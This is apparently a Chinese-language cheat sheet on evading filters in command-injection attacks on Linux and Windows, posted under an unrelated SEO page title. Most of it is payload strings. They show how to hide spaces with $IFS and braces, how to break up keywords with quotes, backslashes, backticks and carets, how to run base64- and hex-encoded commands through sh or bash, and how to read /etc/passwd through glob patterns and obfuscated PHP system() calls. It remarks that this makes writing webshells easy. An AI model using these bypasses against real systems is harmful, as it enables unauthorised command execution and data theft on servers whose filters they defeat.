软件开发流程报告/seo搜索工具栏

## Linux篇

### 命令拼接

```

a=who

b=ami

$a$b //输出whoami

```


常用字符使用

```

& 表示将任务置于后台执行

; 多行语句用换行区分代码快，单行语句一般要用到分号来区分代码块

&& 只有在 && 左边的命令返回真(命令返回值 $? == 0),&&右边的命令才会被执行。

|| 只有在 || 左边的命令返回假(命令返回值 $? == 1),||右边的命令才会被执行。

%0a

%0d

| (管道符) |表示管道，上一条命令的输出，作为下一条命令的参数

```

例:

```

echo qwe ; ls //会先输出字符qwe,然后执行ls

q=l; w=s; e=" -al"; $q$w$e //执行ls -al命令

qwe | ls //执行后面的命令,前面的不执行

```

这些都可以自己去试试...这些字符最多用到的就是;和|就先只说最常用的了...

### 利用Linux的环境变量

```

echo ${PATH}///usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

echo ${PATH:1:9}//usr/local

```


所以,我们可以通过截断和拼接来得到我们想要的来getshell

```

${PATH:5:1}//l

${PATH:2:1}//s

${PATH:5:1}${PATH:2:1}//拼接后是ls,执行命令

${PATH:5:1}s//拼接后是ls,执行命令

```


空格绕过

```

$IFS

$IFS$1

${IFS}

$IFS$9

< 比如cat

<>

{cat,flag.php} //用逗号实现了空格功能，需要用{}括起来

%20

%09

```

### 绕过关键字

基础常见版本:

```

wh\o\ami//反斜线绕过

who"a"mi//双引号绕过

whoa'm'i//单引号绕过

whoam``i//反引号绕过

echo d2hvYW1p|base64 -d|sh//base64绕过,其中d2hvYW1p是whoami的base64编码

echo d2hvYW1p|base64 -d|bash//base64绕过,其中d2hvYW1p是whoami的base64编码

`echo d2hvYW1p|base64 -d` //将其base64解码,然后用反引号来执行命令

echo 77686F616D69 | xxd -r -p | bash //hex绕过,其中77686F616D69是whoami的hex编码

//$*和$@，$x(x 代表 1-9),${x}(x>=10) :比如ca${21}t a.txt表示cat a.txt 在没有传入参数的情况下,这些特殊字符默认为空,如下:

wh$1oami

who$@ami

whoa$*mi

```

进阶深入:

```

666`whoami`666//bash: 666root666: command not found

666`\whoami`666//bash: 666root666: command not found

//命令执行后的结果在2个666中间

```

所以更进一步:

```

w`f1hgb`ho`f1hgb`am`f1hgb`i//反引号的作用是把括起来的字符当做命令执行

w`\f1hgb`ho`\f1hgb`am`\f1hgb`i//这个反斜线作用就是平时的那种连接,反引号的作用是把括起来的字符当做命令执行

wh$(f1hgb)oa$(f1hgb)mi//和上面的差不多,都说执行和拼接

```


上述的是既可以绕过命令,又可以绕过文件名的,下述的则是只能用来绕过文件名的:

```

cat fl[abc]g.php //匹配[abc]中的任何一个

cat f[a-z]ag.txt //匹配a-z范围的任何字符

cat fla* //用*匹配任意

a=f;d=ag;c=l;cat $a$c$d.php 表示cat flag.php//内联执行

```

下述的则是文件名绕过

```

利用正则:比如要读取etc/passwd

cat /???/??????

cat /???/pass*

cat /etc$u/passwd

```

### 命令执行函数绕过

这里只举例`system`

```

system("cat /etc/passwd")

<=>

"\x73\x79\x73\x74\x65\x6d"("cat /etc/passwd");

<=>

(sy.(st).em)("cat /etc/passwd");

<=>还可以用注释方法绕过

"system/*fthgb666*/("cat /etc/passwd);"

<=>

"system/*fthgb666*/(wh./*fthgb666*/(oa)/*fthgb666*/.mi);"

<=>

"(sy./*fthgb666*/(st)/*fthgb666*/.em)/*fthgb666*/(wh./*fthgb666*/(oa)/*fthgb666*/.mi);"

```


## windows篇

### 符号与命令

```

whoami //正常执行

w"h"o"a"m"i 或"w"h"o"a"m"i"或"w"h"o"a"m"i或w"h"o"a"m"i"//正常执行

who^ami或wh""o^a^mi 或wh""o^a^mi"//正常执行

但是"wh""o^a^mi"这种在开头就有单引号的情况是不能执行的

(Whoami)或(Wh^o^am""i)或((((Wh^o^am""i)))) //正常执行 注:可以加无数个"但不能同时连续加2个^符号，因为^号是cmd中的转义符，跟在他后面的符号会被转义

```


### set命令

*知识点:用两个%括起来的变量,会输出变量的值*

```

set a=1 //设置变量a，值为1

echo a //此时输出结果为"a"

echo %a% //此时输出结果为"1"

```

接下来的进阶利用就是:

```

set a=who

set b=ami

%a%%b% //正常执行whoami

call %a%%b% //正常执行whoami

```


所以,上述的符号与命令部分的所有操作,都可以通过set来实现,只需要慢慢拼接就ok

### 切割字符

```

set a=whoami

%a:~0% //取出所有字符,所以正常执行命令

%a:~0,6% //从开始切割6个字符,刚好是whoami,所以正常执行

%a:~0,5% //切割后是whoam,不是系统命令,不能执行

```


注:上述可以使用减号,和python的切割效果差不多

所以,可以考虑的东西就来了:

```

set a=abc qwe //先自定义

wh^o^%a:~0,1%mi //然后截断整理后就变成了:wh^o^ami,所以命令执行成功

```


所以,这样写webshell什么的也就很简单了

### 逻辑运算符

- |:可以连接命令,但只会执行后面的那条

- ||:只有前面的命令失败,才会执行后面的语句

- &:前面的命令可以成功也可以失败,都会执行后面的命令

- &&:必须两条命令都为真才可以全部执行。如果第一条语句错误,整个命令都不执行。如果第一条语句对,第二条错误,就只执行第一条

```

whoami | ping www.baidu.com

whoami || ping www.baidu.com

qwe & ping www.baidu.com

qwe && ping www.baidu.com

```